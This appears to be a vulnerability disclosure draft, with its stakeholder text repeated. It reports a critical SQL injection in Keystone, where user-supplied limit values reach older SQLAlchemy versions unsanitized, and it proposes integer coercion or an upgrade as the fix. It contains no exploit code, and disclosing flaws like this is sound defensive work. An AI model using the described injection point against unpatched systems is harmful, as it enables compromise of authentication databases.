Title: SQLAlchemy/Keystone SQL injection through limit handling
Impact: Critical
Reporter: Nikita Savin
Products: Keystone
Affects: All versions
Description:
Nikita Savin from GridDynamics reported a vulnerability in Keystone's usage of SQLAlchemy. Before version 0.7.0, SQLAlchemy did not sanitize the contents of the limit clause, potentially allowing SQL injection. Keystone directly passes user-provided values to the SQLAlchemy call, triggering SQL injection on vulnerable SQLAlchemy versions, potentially resulting in complete compromise of the authentication database. Only setups using SQLAlchemy < 0.7.0 are affected.
Patch: The attached patch works around the issue in Keystone itself, by coercing limit values to integer. Alternatively, this can be fixed by upgrading to SQLAlchemy >= 0.7.0.
Note: This could all be considered a vulnerability in SQLAlchemy, and a CVE assigned against that (silently-fixed) issue.
Proposed description for stakeholders:
Title: SQLAlchemy/Keystone SQL injection through limit handling
Impact: Critical
Reporter: Nikita Savin
Products: Keystone
Affects: All versions
Description:
Nikita Savin from GridDynamics reported a vulnerability in Keystone's usage of SQLAlchemy. Before version 0.7.0, SQLAlchemy did not sanitize the contents of the limit clause, potentially allowing SQL injection. Keystone directly passes user-provided values to the SQLAlchemy call, triggering SQL injection on vulnerable SQLAlchemy versions, potentially resulting in complete compromise of the authentication database. Only setups using SQLAlchemy < 0.7.0 are affected.
Patch: The attached patch works around the issue in Keystone itself, by coercing limit values to integer. Alternatively, this can be fixed by upgrading to SQLAlchemy >= 0.7.0.
Note: This could all be considered a vulnerability in SQLAlchemy, and a CVE assigned against that (silently-fixed) issue.